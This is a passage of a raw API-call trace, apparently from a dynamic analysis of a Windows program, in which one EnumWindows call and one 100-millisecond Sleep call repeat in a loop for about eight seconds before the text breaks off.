[0141.298] Sleep (dwMilliseconds=0x64) [0141.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.310] Sleep (dwMilliseconds=0x64) [0141.324] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.325] Sleep (dwMilliseconds=0x64) [0141.344] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.344] Sleep (dwMilliseconds=0x64) [0141.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.359] Sleep (dwMilliseconds=0x64) [0141.408] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.409] Sleep (dwMilliseconds=0x64) [0141.449] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.452] Sleep (dwMilliseconds=0x64) [0141.494] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.497] Sleep (dwMilliseconds=0x64) [0141.515] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.516] Sleep (dwMilliseconds=0x64) [0141.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.528] Sleep (dwMilliseconds=0x64) [0141.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.544] Sleep (dwMilliseconds=0x64) [0141.560] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.561] Sleep (dwMilliseconds=0x64) [0141.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.575] Sleep (dwMilliseconds=0x64) [0141.591] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.591] Sleep (dwMilliseconds=0x64) [0141.642] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.642] Sleep (dwMilliseconds=0x64) [0141.698] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.699] Sleep (dwMilliseconds=0x64) [0141.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.715] Sleep (dwMilliseconds=0x64) [0141.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.733] Sleep (dwMilliseconds=0x64) [0141.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.748] Sleep (dwMilliseconds=0x64) [0141.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.763] Sleep (dwMilliseconds=0x64) [0141.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.778] Sleep (dwMilliseconds=0x64) [0141.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.794] Sleep (dwMilliseconds=0x64) [0141.844] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.845] Sleep (dwMilliseconds=0x64) [0141.892] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.892] Sleep (dwMilliseconds=0x64) [0141.906] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.907] Sleep (dwMilliseconds=0x64) [0141.918] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.919] Sleep (dwMilliseconds=0x64) [0141.935] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.935] Sleep (dwMilliseconds=0x64) [0141.958] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.959] Sleep (dwMilliseconds=0x64) [0141.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.966] Sleep (dwMilliseconds=0x64) [0141.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.981] Sleep (dwMilliseconds=0x64) [0142.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.000] Sleep (dwMilliseconds=0x64) [0142.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.013] Sleep (dwMilliseconds=0x64) [0142.057] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.058] Sleep (dwMilliseconds=0x64) [0142.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.123] Sleep (dwMilliseconds=0x64) [0142.140] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.140] Sleep (dwMilliseconds=0x64) [0142.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.154] Sleep (dwMilliseconds=0x64) [0142.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.169] Sleep (dwMilliseconds=0x64) [0142.184] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.185] Sleep (dwMilliseconds=0x64) [0142.200] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.204] Sleep (dwMilliseconds=0x64) [0142.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.216] Sleep (dwMilliseconds=0x64) [0142.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.231] Sleep (dwMilliseconds=0x64) [0142.290] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.291] Sleep (dwMilliseconds=0x64) [0142.337] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.342] Sleep (dwMilliseconds=0x64) [0142.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.358] Sleep (dwMilliseconds=0x64) [0142.372] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.373] Sleep (dwMilliseconds=0x64) [0142.459] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.460] Sleep (dwMilliseconds=0x64) [0142.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.466] Sleep (dwMilliseconds=0x64) [0142.508] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.509] Sleep (dwMilliseconds=0x64) [0142.555] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.560] Sleep (dwMilliseconds=0x64) [0142.574] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.575] Sleep (dwMilliseconds=0x64) [0142.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.731] Sleep (dwMilliseconds=0x64) [0142.865] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.866] Sleep (dwMilliseconds=0x64) [0142.996] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0142.997] Sleep (dwMilliseconds=0x64) [0143.161] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.161] Sleep (dwMilliseconds=0x64) [0143.244] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.244] Sleep (dwMilliseconds=0x64) [0143.346] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.347] Sleep (dwMilliseconds=0x64) [0143.361] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.361] Sleep (dwMilliseconds=0x64) [0143.377] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.378] Sleep (dwMilliseconds=0x64) [0143.389] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.390] Sleep (dwMilliseconds=0x64) [0143.449] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.450] Sleep (dwMilliseconds=0x64) [0143.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.516] Sleep (dwMilliseconds=0x64) [0143.563] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.563] Sleep (dwMilliseconds=0x64) [0143.583] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.584] Sleep (dwMilliseconds=0x64) [0143.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.591] Sleep (dwMilliseconds=0x64) [0143.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.609] Sleep (dwMilliseconds=0x64) [0143.624] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.625] Sleep (dwMilliseconds=0x64) [0143.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.642] Sleep (dwMilliseconds=0x64) [0143.657] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.657] Sleep (dwMilliseconds=0x64) [0143.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.672] Sleep (dwMilliseconds=0x64) [0143.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.734] Sleep (dwMilliseconds=0x64) [0143.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.781] Sleep (dwMilliseconds=0x64) [0143.803] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.809] Sleep (dwMilliseconds=0x64) [0143.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.825] Sleep (dwMilliseconds=0x64) [0143.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.841] Sleep (dwMilliseconds=0x64) [0143.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.860] Sleep (dwMilliseconds=0x64) [0143.875] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.876] Sleep (dwMilliseconds=0x64) [0143.887] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.888] Sleep (dwMilliseconds=0x64) [0143.935] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.935] Sleep (dwMilliseconds=0x64) [0143.986] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0143.987] Sleep (dwMilliseconds=0x64) [0144.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.032] Sleep (dwMilliseconds=0x64) [0144.045] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.046] Sleep (dwMilliseconds=0x64) [0144.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.062] Sleep (dwMilliseconds=0x64) [0144.088] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.089] Sleep (dwMilliseconds=0x64) [0144.121] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.122] Sleep (dwMilliseconds=0x64) [0144.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.138] Sleep (dwMilliseconds=0x64) [0144.203] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.203] Sleep (dwMilliseconds=0x64) [0144.250] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.251] Sleep (dwMilliseconds=0x64) [0144.285] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.285] Sleep (dwMilliseconds=0x64) [0144.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.294] Sleep (dwMilliseconds=0x64) [0144.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.309] Sleep (dwMilliseconds=0x64) [0144.326] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.326] Sleep (dwMilliseconds=0x64) [0144.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.341] Sleep (dwMilliseconds=0x64) [0144.362] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.362] Sleep (dwMilliseconds=0x64) [0144.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.376] Sleep (dwMilliseconds=0x64) [0144.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.435] Sleep (dwMilliseconds=0x64) [0144.541] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.541] Sleep (dwMilliseconds=0x64) [0144.551] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.551] Sleep (dwMilliseconds=0x64) [0144.565] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.569] Sleep (dwMilliseconds=0x64) [0144.574] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.579] Sleep (dwMilliseconds=0x64) [0144.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.591] Sleep (dwMilliseconds=0x64) [0144.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.607] Sleep (dwMilliseconds=0x64) [0144.622] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.623] Sleep (dwMilliseconds=0x64) [0144.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.641] Sleep (dwMilliseconds=0x64) [0144.657] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.657] Sleep (dwMilliseconds=0x64) [0144.704] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.704] Sleep (dwMilliseconds=0x64) [0144.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.750] Sleep (dwMilliseconds=0x64) [0144.770] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.770] Sleep (dwMilliseconds=0x64) [0144.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.778] Sleep (dwMilliseconds=0x64) [0144.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.797] Sleep (dwMilliseconds=0x64) [0144.810] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.811] Sleep (dwMilliseconds=0x64) [0144.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.825] Sleep (dwMilliseconds=0x64) [0144.842] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.843] Sleep (dwMilliseconds=0x64) [0144.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.856] Sleep (dwMilliseconds=0x64) [0144.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.872] Sleep (dwMilliseconds=0x64) [0144.920] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.920] Sleep (dwMilliseconds=0x64) [0144.984] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.985] Sleep (dwMilliseconds=0x64) [0144.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0144.998] Sleep (dwMilliseconds=0x64) [0145.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.013] Sleep (dwMilliseconds=0x64) [0145.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.032] Sleep (dwMilliseconds=0x64) [0145.045] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.045] Sleep (dwMilliseconds=0x64) [0145.061] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.061] Sleep (dwMilliseconds=0x64) [0145.086] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.087] Sleep (dwMilliseconds=0x64) [0145.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.091] Sleep (dwMilliseconds=0x64) [0145.140] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.141] Sleep (dwMilliseconds=0x64) [0145.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.188] Sleep (dwMilliseconds=0x64) [0145.214] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.214] Sleep (dwMilliseconds=0x64) [0145.237] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.238] Sleep (dwMilliseconds=0x64) [0145.246] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.251] Sleep (dwMilliseconds=0x64) [0145.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.265] Sleep (dwMilliseconds=0x64) [0145.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.282] Sleep (dwMilliseconds=0x64) [0145.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.298] Sleep (dwMilliseconds=0x64) [0145.313] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.313] Sleep (dwMilliseconds=0x64) [0145.329] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.330] Sleep (dwMilliseconds=0x64) [0145.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.391] Sleep (dwMilliseconds=0x64) [0145.533] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.534] Sleep (dwMilliseconds=0x64) [0145.937] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0145.937] Sleep (dwMilliseconds=0x64) [0146.010] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.010] Sleep (dwMilliseconds=0x64) [0146.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.063] Sleep (dwMilliseconds=0x64) [0146.098] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.099] Sleep (dwMilliseconds=0x64) [0146.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.106] Sleep (dwMilliseconds=0x64) [0146.124] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.125] Sleep (dwMilliseconds=0x64) [0146.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.137] Sleep (dwMilliseconds=0x64) [0146.158] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.158] Sleep (dwMilliseconds=0x64) [0146.169] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.169] Sleep (dwMilliseconds=0x64) [0146.186] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.187] Sleep (dwMilliseconds=0x64) [0146.202] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.202] Sleep (dwMilliseconds=0x64) [0146.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.266] Sleep (dwMilliseconds=0x64) [0146.303] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.303] Sleep (dwMilliseconds=0x64) [0146.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.309] Sleep (dwMilliseconds=0x64) [0146.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.328] Sleep (dwMilliseconds=0x64) [0146.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.344] Sleep (dwMilliseconds=0x64) [0146.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.357] Sleep (dwMilliseconds=0x64) [0146.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.375] Sleep (dwMilliseconds=0x64) [0146.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.387] Sleep (dwMilliseconds=0x64) [0146.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.403] Sleep (dwMilliseconds=0x64) [0146.468] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.468] Sleep (dwMilliseconds=0x64) [0146.510] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.510] Sleep (dwMilliseconds=0x64) [0146.514] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.514] Sleep (dwMilliseconds=0x64) [0146.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.528] Sleep (dwMilliseconds=0x64) [0146.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.544] Sleep (dwMilliseconds=0x64) [0146.562] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.563] Sleep (dwMilliseconds=0x64) [0146.577] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.578] Sleep (dwMilliseconds=0x64) [0146.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.593] Sleep (dwMilliseconds=0x64) [0146.660] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.661] Sleep (dwMilliseconds=0x64) [0146.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.920] Sleep (dwMilliseconds=0x64) [0146.969] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.970] Sleep (dwMilliseconds=0x64) [0146.983] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0146.984] Sleep (dwMilliseconds=0x64) [0147.001] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.001] Sleep (dwMilliseconds=0x64) [0147.069] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.069] Sleep (dwMilliseconds=0x64) [0147.089] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.090] Sleep (dwMilliseconds=0x64) [0147.157] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.158] Sleep (dwMilliseconds=0x64) [0147.204] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.204] Sleep (dwMilliseconds=0x64) [0147.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.215] Sleep (dwMilliseconds=0x64) [0147.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.231] Sleep (dwMilliseconds=0x64) [0147.246] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.247] Sleep (dwMilliseconds=0x64) [0147.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.263] Sleep (dwMilliseconds=0x64) [0147.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.278] Sleep (dwMilliseconds=0x64) [0147.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.297] Sleep (dwMilliseconds=0x64) [0147.343] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.344] Sleep (dwMilliseconds=0x64) [0147.391] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.391] Sleep (dwMilliseconds=0x64) [0147.408] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.408] Sleep (dwMilliseconds=0x64) [0147.420] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.420] Sleep (dwMilliseconds=0x64) [0147.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.438] Sleep (dwMilliseconds=0x64) [0147.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.450] Sleep (dwMilliseconds=0x64) [0147.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.469] Sleep (dwMilliseconds=0x64) [0147.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.482] Sleep (dwMilliseconds=0x64) [0147.496] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.497] Sleep (dwMilliseconds=0x64) [0147.517] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.518] Sleep (dwMilliseconds=0x64) [0147.562] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.563] Sleep (dwMilliseconds=0x64) [0147.670] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.671] Sleep (dwMilliseconds=0x64) [0147.690] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.691] Sleep (dwMilliseconds=0x64) [0147.699] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.700] Sleep (dwMilliseconds=0x64) [0147.716] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.716] Sleep (dwMilliseconds=0x64) [0147.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.732] Sleep (dwMilliseconds=0x64) [0147.750] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.750] Sleep (dwMilliseconds=0x64) [0147.767] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.767] Sleep (dwMilliseconds=0x64) [0147.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.782] Sleep (dwMilliseconds=0x64) [0147.845] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.845] Sleep (dwMilliseconds=0x64) [0147.912] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.912] Sleep (dwMilliseconds=0x64) [0147.924] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.925] Sleep (dwMilliseconds=0x64) [0147.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.934] Sleep (dwMilliseconds=0x64) [0147.954] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.955] Sleep (dwMilliseconds=0x64) [0147.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.966] Sleep (dwMilliseconds=0x64) [0147.985] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0147.985] Sleep (dwMilliseconds=0x64) [0148.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.000] Sleep (dwMilliseconds=0x64) [0148.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.016] Sleep (dwMilliseconds=0x64) [0148.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.032] Sleep (dwMilliseconds=0x64) [0148.141] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.142] Sleep (dwMilliseconds=0x64) [0148.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.188] Sleep (dwMilliseconds=0x64) [0148.216] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.216] Sleep (dwMilliseconds=0x64) [0148.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.232] Sleep (dwMilliseconds=0x64) [0148.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.250] Sleep (dwMilliseconds=0x64) [0148.266] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.267] Sleep (dwMilliseconds=0x64) [0148.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.280] Sleep (dwMilliseconds=0x64) [0148.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.294] Sleep (dwMilliseconds=0x64) [0148.348] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.348] Sleep (dwMilliseconds=0x64) [0148.393] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.394] Sleep (dwMilliseconds=0x64) [0148.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.437] Sleep (dwMilliseconds=0x64) [0148.452] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.452] Sleep (dwMilliseconds=0x64) [0148.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.466] Sleep (dwMilliseconds=0x64) [0148.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.484] Sleep (dwMilliseconds=0x64) [0148.496] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.500] Sleep (dwMilliseconds=0x64) [0148.517] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.518] Sleep (dwMilliseconds=0x64) [0148.530] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.531] Sleep (dwMilliseconds=0x64) [0148.546] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.547] Sleep (dwMilliseconds=0x64) [0148.561] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.562] Sleep (dwMilliseconds=0x64) [0148.607] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.616] Sleep (dwMilliseconds=0x64) [0148.688] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.689] Sleep (dwMilliseconds=0x64) [0148.703] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.703] Sleep (dwMilliseconds=0x64) [0148.720] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.720] Sleep (dwMilliseconds=0x64) [0148.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.734] Sleep (dwMilliseconds=0x64) [0148.750] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.750] Sleep (dwMilliseconds=0x64) [0148.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.766] Sleep (dwMilliseconds=0x64) [0148.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.783] Sleep (dwMilliseconds=0x64) [0148.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.797] Sleep (dwMilliseconds=0x64) [0148.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.844] Sleep (dwMilliseconds=0x64) [0148.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.891] Sleep (dwMilliseconds=0x64) [0148.908] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.908] Sleep (dwMilliseconds=0x64) [0148.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.919] Sleep (dwMilliseconds=0x64) [0148.938] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.938] Sleep (dwMilliseconds=0x64) [0148.953] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.953] Sleep (dwMilliseconds=0x64) [0148.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0148.966] Sleep (dwMilliseconds=0x64) [0149.065] EnumWindows (lpEnumFunc=0x563dd0, 